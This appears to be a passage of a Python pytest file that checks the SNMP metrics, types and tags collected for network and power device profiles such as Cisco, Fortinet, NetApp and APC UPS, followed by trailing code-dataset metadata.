aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
if_tags = ['interface:eth0'] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1)
aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1)
frus = [3, 4, 5, 7, 16, 17, 24, 25]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpus = [7746]
for cpu in cpus:
tags = ['cpu:{}'.format(cpu)] + common_tags
for metric in CPU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
sensor_tags = ['sensor_id:31', 'sensor_type:9'] + common_tags
aggregator.assert_metric('snmp.entPhySensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
stat_tags = [(20, 2), (5, 5)]
for (svc, stat) in stat_tags:
aggregator.assert_metric(
'snmp.cfwConnectionStatValue',
metric_type=aggregator.GAUGE,
tags=['stat_type:{}'.format(stat), 'service_type:{}'.format(svc)] + common_tags,
)
aggregator.assert_metric('snmp.crasNumDeclinedSessions', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric('snmp.crasNumSessions', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric('snmp.crasNumUsers', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric(
'snmp.crasNumSetupFailInsufResources', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags
)
aggregator.assert_metric('snmp.cipSecGlobalActiveTunnels', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric('snmp.cipSecGlobalHcInOctets', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags)
aggregator.assert_metric('snmp.cipSecGlobalHcOutOctets', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags)
for (index, state) in [(3, 3), (6, 6), (8, 6), (11, 6), (13, 3), (14, 6), (20, 6), (21, 4), (31, 5)]:
aggregator.assert_metric(
'snmp.ciscoEnvMonTemperatureStatusValue',
metric_type=aggregator.GAUGE,
tags=['temp_state:{}'.format(state), 'temp_index:{}'.format(index)] + common_tags,
)
aggregator.assert_metric(
'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=['power_source:1'] + common_tags,
)
fan_indices = [4, 6, 7, 16, 21, 22, 25, 27]
for index in fan_indices:
tags = ['fan_status_index:{}'.format(index)] + common_tags
aggregator.assert_metric(
'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=tags,
)
aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE)
aggregator.assert_metric(
'snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=['mac_addr:0xffffffffffff'] + common_tags
)
frus = [2, 7, 8, 21, 26, 27, 30, 31]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
aggregator.assert_metric(
'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags
)
for metrics in MEMORY_METRICS:
tags = ['mem_pool_name:test_pool'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metrics), metric_type=aggregator.GAUGE, tags=tags)
for conn in [1, 2, 5]:
conn_tags = ['connection_type:{}'.format(conn)] + common_tags
aggregator.assert_metric('snmp.cfwConnectionStatCount', metric_type=aggregator.RATE, tags=conn_tags)
hardware_tags = [(3, 'Secondary unit'), (5, 'Primary unit'), (6, 'Failover LAN Interface')]
for (htype, hdesc) in hardware_tags:
aggregator.assert_metric(
'snmp.cfwHardwareStatusValue',
metric_type=aggregator.GAUGE,
tags=['hardware_type:{}'.format(htype), 'hardware_desc:{}'.format(hdesc)] + common_tags,
)
for switch in [4684, 4850, 8851, 9997, 15228, 16580, 24389, 30813, 36264]:
aggregator.assert_metric(
'snmp.cvsChassisUpTime',
metric_type=aggregator.GAUGE,
tags=['chassis_switch_id:{}'.format(switch)] + common_tags,
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# RTT
rtt_indexes = [1, 7, 10, 13, 15, 18, 20]
rtt_types = [22, 21, 17, 6, 20, 8, 16]
rtt_states = [3, 1, 6, 4, 6, 1, 6]
rtt_gauges = ['rttMonLatestRttOperCompletionTime', 'rttMonLatestRttOperSense', 'rttMonCtrlOperTimeoutOccurred']
for i in range(len(rtt_indexes)):
tags = [
"rtt_index:{}".format(rtt_indexes[i]),
"rtt_type:{}".format(rtt_types[i]),
"rtt_state:{}".format(rtt_states[i]),
] + common_tags
for rtt in rtt_gauges:
aggregator.assert_metric('snmp.{}'.format(rtt), metric_type=aggregator.GAUGE, tags=tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_csr(aggregator):
run_profile_check('cisco-csr1000v')
common_tags = common.CHECK_TAGS + ['snmp_profile:cisco-csr1000v']
common.assert_common_metrics(aggregator, common_tags)
tags = ['neighbor:244.12.239.177'] + common_tags
for metric in PEER_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
for metric in PEER_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags)
aggregator.assert_all_metrics_covered()
aggregator.assert_metrics_using_metadata(get_metadata_metrics())
@pytest.mark.usefixtures("dd_environment")
def test_checkpoint_firewall(aggregator):
run_profile_check('checkpoint-firewall')
common_tags = common.CHECK_TAGS + ['snmp_profile:checkpoint-firewall']
common.assert_common_metrics(aggregator, common_tags)
cpu_metrics = [
'multiProcUserTime',
'multiProcSystemTime',
'multiProcIdleTime',
'multiProcUsage',
]
cpu_cores = [7097, 13039, 13761, 28994, 29751, 33826, 40053, 48847, 61593, 65044]
for core in cpu_cores:
tags = ['cpu_core:{}'.format(core)] + common_tags
for metric in cpu_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
aggregator.assert_metric('snmp.procNum', metric_type=aggregator.GAUGE, tags=common_tags)
mem_metrics = ['memTotalReal64', 'memActiveReal64', 'memFreeReal64', 'memTotalVirtual64', 'memActiveVirtual64']
for metric in mem_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags)
disk_metrics = [
'multiDiskSize',
'multiDiskUsed',
'multiDiskFreeTotalBytes',
'multiDiskFreeAvailableBytes',
'multiDiskFreeTotalPercent',
'multiDiskFreeAvailablePercent',
]
appliance_metrics = [
'fanSpeedSensorValue',
'fanSpeedSensorStatus',
'tempertureSensorValue',
'tempertureSensorStatus',
]
common_indices = range(10)
common_names = ['first', 'second', 'third', 'fourth', 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth']
for idx in common_indices:
name = common_names[idx]
tags = ['disk_index:{}'.format(idx), 'disk_name:{}'.format(name)] + common_tags
for metric in disk_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
tags = ['sensor_index:{}'.format(idx), 'sensor_name:{}'.format(name)] + common_tags
for metric in appliance_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
fw_count_metrics = ['fwAccepted', 'fwDropped', 'fwRejected']
for metric in fw_count_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags)
fw_gauge_metrics = ['fwNumConn', 'fwPeakNumConn']
for metric in fw_gauge_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_arista(aggregator):
run_profile_check('arista')
common_tags = common.CHECK_TAGS + ['snmp_profile:arista']
common.assert_common_metrics(aggregator, common_tags)
aggregator.assert_metric(
'snmp.aristaEgressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:13', 'queue_index:10'],
count=1,
)
aggregator.assert_metric(
'snmp.aristaEgressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:28', 'queue_index:22'],
count=1,
)
aggregator.assert_metric(
'snmp.aristaIngressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:7', 'queue_index:25'],
count=1,
)
aggregator.assert_metric(
'snmp.aristaIngressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:8', 'queue_index:24'],
count=1,
)
for (sensor_id, sensor_type) in [(1, 11), (7, 8)]:
sensor_tags = ['sensor_id:{}'.format(sensor_id), 'sensor_type:{}'.format(sensor_type)] + common_tags
aggregator.assert_metric('snmp.entPhySensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
aggregator.assert_metric('snmp.entPhySensorOperStatus', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_aruba(aggregator):
run_profile_check('aruba')
common_tags = common.CHECK_TAGS + ['snmp_profile:aruba']
common.assert_common_metrics(aggregator, common_tags)
for fan in [18, 28]:
fan_tags = common_tags + ['fan_index:{}'.format(fan)]
aggregator.assert_metric('snmp.sysExtFanStatus', metric_type=aggregator.GAUGE, tags=fan_tags, count=1)
for psu in [1, 17]:
psu_tags = common_tags + ['powersupply_index:{}'.format(psu)]
aggregator.assert_metric('snmp.sysExtPowerSupplyStatus', metric_type=aggregator.GAUGE, tags=psu_tags, count=1)
for proc in [11, 26]:
proc_tags = common_tags + ['processor_index:{}'.format(proc)]
aggregator.assert_metric('snmp.sysExtProcessorLoad', metric_type=aggregator.GAUGE, tags=proc_tags, count=1)
for mem in [3, 20]:
mem_tags = common_tags + ['memory_index:{}'.format(mem)]
aggregator.assert_metric('snmp.sysExtMemorySize', metric_type=aggregator.GAUGE, tags=mem_tags, count=1)
aggregator.assert_metric('snmp.sysExtMemoryUsed', metric_type=aggregator.GAUGE, tags=mem_tags, count=1)
aggregator.assert_metric('snmp.sysExtMemoryFree', metric_type=aggregator.GAUGE, tags=mem_tags, count=1)
aggregator.assert_metric(
'snmp.wlsxSysExtPacketLossPercent', metric_type=aggregator.GAUGE, tags=common_tags, count=1
)
# OSPF metrics
neighbor_metrics = [
('ospfNbrEvents', aggregator.RATE),
('ospfNbrState', aggregator.GAUGE),
('ospfNbrLsRetransQLen', aggregator.GAUGE),
]
for metric, metric_type in neighbor_metrics:
tags = ['neighbor_ip:192.29.116.26', 'neighbor_id:192.29.66.79'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1)
virtual_neighbor_metrics = [
('ospfVirtNbrState', aggregator.GAUGE),
('ospfVirtNbrEvents', aggregator.RATE),
('ospfVirtNbrLsRetransQLen', aggregator.GAUGE),
]
for metric, metric_type in virtual_neighbor_metrics:
for ip, nbr in [('74.210.82.1', '194.154.66.112'), ('122.226.86.1', '184.201.101.140')]:
tags = ['neighbor_ip:{}'.format(ip), 'neighbor_id:{}'.format(nbr)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1)
lls_metrics = ['ospfIfRetransInterval', 'ospfIfState', 'ospfIfLsaCount']
for metric in lls_metrics:
for ip, nbr in [('58.115.169.188', '192.29.66.79'), ('18.2.8.29', '118.246.193.247')]:
tags = ['ospf_ip_addr:{}'.format(ip), 'neighbor_id:{}'.format(nbr)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
virtual_lls_metrics = ['ospfVirtIfRetransInterval', 'ospfVirtIfState', 'ospfVirtIfLsaCount']
for metric in virtual_lls_metrics:
for nbr in ['194.154.66.112', '184.201.101.140']:
tags = ['neighbor_id:{}'.format(nbr)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_chatsworth(aggregator):
run_profile_check('chatsworth')
# Legacy global tags are applied to all metrics
legacy_global_tags = [
'legacy_pdu_macaddress:00:0E:D3:AA:CC:EE',
'legacy_pdu_model:P10-1234-ABC',
'legacy_pdu_name:legacy-name1',
'legacy_pdu_version:1.2.3',
]
common_tags = common.CHECK_TAGS + legacy_global_tags + ['snmp_profile:chatsworth_pdu']
common.assert_common_metrics(aggregator, common_tags)
# Legacy metrics
legacy_pdu_tags = common_tags
legacy_pdu_gauge_metrics = [
'snmp.pduRole',
'snmp.outOfService',
]
legacy_pdu_monotonic_count_metrics = []
for line in range(1, 4):
legacy_pdu_gauge_metrics.append('snmp.line{}curr'.format(line))
for branch in range(1, 3):
legacy_pdu_gauge_metrics.append('snmp.temperatureProbe{}'.format(branch))
legacy_pdu_gauge_metrics.append('snmp.humidityProbe{}'.format(branch))
for xyz in ['xy', 'yz', 'zx']:
legacy_pdu_monotonic_count_metrics.append('snmp.energy{}{}s'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.voltage{}{}'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.power{}{}'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.powerFact{}{}'.format(xyz, branch))
legacy_pdu_gauge_metrics.append('snmp.current{}{}'.format(xyz, branch))
for branch in range(1, 25):
legacy_pdu_monotonic_count_metrics.append('snmp.receptacleEnergyoutlet{}s'.format(branch))
legacy_pdu_gauge_metrics.append('snmp.outlet{}Current'.format(branch))
for metric in legacy_pdu_gauge_metrics:
aggregator.assert_metric(metric, metric_type=aggregator.GAUGE, tags=legacy_pdu_tags, count=1)
for metric in legacy_pdu_monotonic_count_metrics:
aggregator.assert_metric(metric, metric_type=aggregator.MONOTONIC_COUNT, tags=legacy_pdu_tags, count=1)
# New metrics
pdu_tags = common_tags + [
'pdu_cabinetid:cab1',
'pdu_ipaddress:42.2.210.224',
'pdu_macaddress:0x00249b3503f6',
'pdu_model:model1',
'pdu_name:name1',
'pdu_version:v1.1',
]
aggregator.assert_metric('snmp.cpiPduNumberBranches', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduNumberOutlets', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutOfService', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduUpgrade', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduChainRole', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
aggregator.assert_metric('snmp.cpiPduTotalPower', metric_type=aggregator.GAUGE, tags=pdu_tags, count=1)
for lock in [1, 2]:
lock_tags = common_tags + ['lock_id:{}'.format(lock)]
aggregator.assert_metric('snmp.cpiPduEasStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1)
aggregator.assert_metric('snmp.cpiPduDoorStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1)
aggregator.assert_metric('snmp.cpiPduLockStatus', metric_type=aggregator.GAUGE, tags=lock_tags, count=1)
for (sensor_name, sensor_index) in [('sensor1', 4), ('sensor2', 6)]:
sensor_tags = common_tags + [
'sensor_index:{}'.format(sensor_index),
'sensor_name:{}'.format(sensor_name),
'sensor_type:1',
]
aggregator.assert_metric('snmp.cpiPduSensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
for line in [6, 18]:
line_tags = common_tags + ['line_id:{}'.format(line)]
aggregator.assert_metric('snmp.cpiPduLineCurrent', metric_type=aggregator.GAUGE, tags=line_tags, count=1)
for branch in [1, 17]:
branch_tags = common_tags + ['branch_id:{}'.format(branch)]
aggregator.assert_metric('snmp.cpiPduBranchCurrent', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric('snmp.cpiPduBranchMaxCurrent', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric('snmp.cpiPduBranchVoltage', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric('snmp.cpiPduBranchPower', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric(
'snmp.cpiPduBranchPowerFactor', metric_type=aggregator.GAUGE, tags=branch_tags, count=1
)
aggregator.assert_metric('snmp.cpiPduBranchStatus', metric_type=aggregator.GAUGE, tags=branch_tags, count=1)
aggregator.assert_metric(
'snmp.cpiPduBranchEnergy', metric_type=aggregator.MONOTONIC_COUNT, tags=branch_tags, count=1
)
for (outlet_id, outlet_branch, outlet_name) in [(7, 29, 'outlet1'), (16, 23, 'outlet2')]:
outlet_tags = common_tags + [
'outlet_id:{}'.format(outlet_id),
'outlet_branchid:{}'.format(outlet_branch),
'outlet_name:{}'.format(outlet_name),
]
aggregator.assert_metric('snmp.cpiPduOutletCurrent', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutletVoltage', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutletPower', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric('snmp.cpiPduOutletStatus', metric_type=aggregator.GAUGE, tags=outlet_tags, count=1)
aggregator.assert_metric(
'snmp.cpiPduOutletEnergy', metric_type=aggregator.MONOTONIC_COUNT, tags=outlet_tags, count=1
)
aggregator.assert_all_metrics_covered()
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_metric_type=False)
@pytest.mark.usefixtures("dd_environment")
def test_isilon(aggregator):
run_profile_check('isilon')
common_tags = common.CHECK_TAGS + [
'snmp_profile:isilon',
'cluster_name:testcluster1',
'node_name:node1',
'node_type:1',
]
cluster_rates = [
'clusterIfsInBytes',
'clusterIfsOutBytes',
]
node_rates = [
'nodeIfsOutBytes',
'nodeIfsInBytes',
]
protocol_metrics = [
'protocolOpsPerSecond',
'latencyMin',
'latencyMax',
'latencyAverage',
]
quota_metrics = ['quotaHardThreshold', 'quotaSoftThreshold', 'quotaUsage', 'quotaAdvisoryThreshold']
quota_ids_types = [
(422978632, 1),
(153533730, 5),
(3299369987, 4),
(2149993012, 3),
(1424325378, 1),
(4245321451, 0),
(2328145711, 1),
(1198032230, 4),
(1232918362, 1),
(1383990869, 1),
]
common.assert_common_metrics(aggregator, common_tags)
for metric in quota_metrics:
for qid, qtype in quota_ids_types:
tags = ['quota_id:{}'.format(qid), 'quota_type:{}'.format(qtype)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in protocol_metrics:
for num in range(1, 3):
tags = ['protocol_name:testprotocol{}'.format(num)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.clusterHealth', metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in cluster_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=common_tags, count=1)
aggregator.assert_metric('snmp.nodeHealth', metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in node_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=common_tags, count=1)
for fan in [4, 6, 10, 11, 14, 21, 22, 23, 25, 30]:
tags = ['fan_name:testfan', 'fan_number:{}'.format(fan)] + common_tags
aggregator.assert_metric('snmp.fanSpeed', metric_type=aggregator.GAUGE, tags=tags, count=1)
for status, bay in [('SMARTFAIL', 1), ('HEALTHY', 2), ('DEAD', 3)]:
tags = common_tags + ['disk_status:{}'.format(status), 'disk_bay:{}'.format((bay))]
aggregator.assert_metric('snmp.diskSizeBytes', metric_type=aggregator.RATE, tags=tags)
aggregator.assert_metric('snmp.ifsUsedBytes', metric_type=aggregator.RATE, tags=common_tags, count=1)
aggregator.assert_metric('snmp.ifsTotalBytes', metric_type=aggregator.RATE, tags=common_tags, count=1)
@pytest.mark.usefixtures("dd_environment")
def test_apc_ups(aggregator):
run_profile_check('apc_ups')
profile_tags = [
'snmp_profile:apc_ups',
'model:APC Smart-UPS 600',
'firmware_version:2.0.3-test',
'serial_num:test_serial',
'ups_name:testIdentName',
]
tags = common.CHECK_TAGS + profile_tags
metrics = [
'upsAdvBatteryNumOfBadBattPacks',
'upsAdvBatteryReplaceIndicator',
'upsAdvBatteryRunTimeRemaining',
'upsAdvBatteryTemperature',
'upsAdvBatteryCapacity',
'upsHighPrecInputFrequency',
'upsHighPrecInputLineVoltage',
'upsHighPrecOutputCurrent',
'upsAdvInputLineFailCause',
'upsAdvOutputLoad',
'upsBasicBatteryTimeOnBattery',
'upsAdvTestDiagnosticsResults',
]
common.assert_common_metrics(aggregator, tags)
for metric in metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric(
'snmp.upsOutletGroupStatusGroupState',
metric_type=aggregator.GAUGE,
tags=['outlet_group_name:test_outlet'] + tags,
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.AVRTrimActive', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.BatteriesDischarged', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.LowBatteryOnBattery', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.NoBatteriesAttached', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.OnLine', 0, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_metric(
'snmp.upsBasicStateOutputState.ReplaceBattery', 1, metric_type=aggregator.GAUGE, tags=tags, count=1
)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_fortinet_fortigate(aggregator):
run_profile_check('fortinet-fortigate')
common_tags = common.CHECK_TAGS + ['snmp_profile:fortinet-fortigate']
common_gauge_metrics = [
'fgSysCpuUsage',
'fgSysMemUsage',
'fgSysMemCapacity',
'fgSysLowMemUsage',
'fgSysLowMemCapacity',
'fgSysDiskUsage',
'fgSysDiskCapacity',
'fgSysSesCount',
'fgSysSesRate1',
'fgSysSes6Count',
'fgSysSes6Rate1',
'fgApHTTPConnections',
'fgApHTTPMaxConnections',
'fgVdNumber',
'fgVdMaxVdoms',
]
processor_gauge_metrics = [
'fgProcessorUsage',
'fgProcessorSysUsage',
]
processor_count_metrics = [
'fgProcessorPktRxCount',
'fgProcessorPktTxCount',
'fgProcessorPktDroppedCount',
]
processor_tags = common_tags + ['processor_index:12']
vd_metrics = [
'fgVdEntOpMode',
'fgVdEntHaState',
'fgVdEntCpuUsage',
'fgVdEntMemUsage',
'fgVdEntSesCount',
'fgVdEntSesRate',
]
vd_tags = common_tags + ['virtualdomain_index:4', 'virtualdomain_name:their oxen quaintly']
common.assert_common_metrics(aggregator, common_tags)
for metric in common_gauge_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in processor_gauge_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=processor_tags, count=1)
for metric in processor_count_metrics:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=processor_tags, count=1
)
aggregator.assert_metric(
'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=processor_tags, count=1
)
for metric in vd_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=vd_tags, count=1)
# Interface
aggregator.assert_metric('snmp.fgIntfEntVdom', metric_type=aggregator.GAUGE, count=1)
# Firewall
firewall_tags = common_tags + ['policy_index:22']
for metric in ['fgFwPolPktCount', 'fgFwPolByteCount']:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=firewall_tags, count=1
)
aggregator.assert_metric(
'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=firewall_tags, count=1
)
# Firewall 6
firewall6_tags = common_tags + ['policy6_index:29']
for metric in ['fgFwPol6PktCount', 'fgFwPol6ByteCount']:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=firewall6_tags, count=1
)
aggregator.assert_metric(
'snmp.{}.rate'.format(metric), metric_type=aggregator.RATE, tags=firewall6_tags, count=1
)
aggregator.assert_all_metrics_covered()
aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_metric_type=False)
@pytest.mark.usefixtures("dd_environment")
def test_netapp(aggregator):
run_profile_check('netapp')
profile_tags = [
'snmp_profile:netapp',
'snmp_host:example-datacenter.company',
]
common_tags = common.CHECK_TAGS + profile_tags
common.assert_common_metrics(aggregator, common_tags)
gauges = [
'cfInterconnectStatus',
'miscCacheAge',
'ncHttpActiveCliConns',
]
counts = [
'extcache64Hits',
]
for metric in gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
snapvault_counts = [
'svTotalFailures',
]
snapvaults = [('5', '/vol/dir1', '5'), ('6', '/vol/dir3', '2'), ('18', '/vol/dir9', '4')]
for metric in snapvault_counts:
for index, destination, state in snapvaults:
tags = [
'index:{}'.format(index),
'destination:{}'.format(destination),
'state:{}'.format(state),
] + common_tags
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
snapmirrors = [('6', '1'), ('9', '5'), ('29', '1')]
snapmirror_gauges = [
'snapmirrorLag',
]
snapmirror_counts = [
'snapmirrorTotalFailures',
]
for index, state in snapmirrors:
tags = ['index:{}'.format(index), 'state:{}'.format(state)] + common_tags
for metric in snapmirror_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in snapmirror_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
filesystem_gauges = [
'dfHighTotalKBytes',
'dfHighAvailKBytes',
'dfInodesUsed',
'dfInodesFree',
]
filesystem_indexes = [
'1022',
'1023',
'1024',
'1025',
'1026',
'1027',
'1028',
'1029',
'1032',
'1033',
]
filesystems = ['/vol/dir{}'.format(n) for n in range(1, len(filesystem_indexes) + 1)]
for metric in filesystem_gauges:
for index, filesystem in zip(filesystem_indexes, filesystems):
tags = ['index:{}'.format(index), 'filesystem:{}'.format(filesystem)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
if_counts = [
'ifHighInOctets',
]
if_rates = [
'ifHighInOctets.rate',
]
interfaces = [
# Interface descriptions will be normalized in the backend, but we receive the raw DisplayString values here.
('6', 'netgear ifX300 v1'),
('7', 'junyper proto12 12.3'),
('23', 'malabar yz42 10.2020'),
]
for index, descr in interfaces:
tags = ['index:{}'.format(index), 'interface:{}'.format(descr)] + common_tags
for metric in if_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in if_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_catalyst(aggregator):
run_profile_check('cisco-catalyst')
common_tags = common.CHECK_TAGS + ['snmp_host:catalyst-6000.example', 'snmp_profile:cisco-catalyst']
sensors = [5, 9]
for sensor in sensors:
tags = ['sensor_id:{}'.format(sensor), 'sensor_type:10'] + common_tags
aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1)
interfaces = ["Gi1/0/{}".format(i) for i in [6, 10, 12, 18, 22, 25, 27]]
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in CIE_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
frus = [1001, 1010, 2001, 2010]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_metric('snmp.devices_monitored', count=1)
aggregator.assert_all_metrics_covered()
| 41.462159
| 120
| 0.672881
|
76a696faa434f1a385919c7aa42b0c62bf8e9a58
| 2,644
|
py
|
Python
|
scons-local-1.1.0/SCons/Tool/CVS.py
|
frew/simpleproto
|
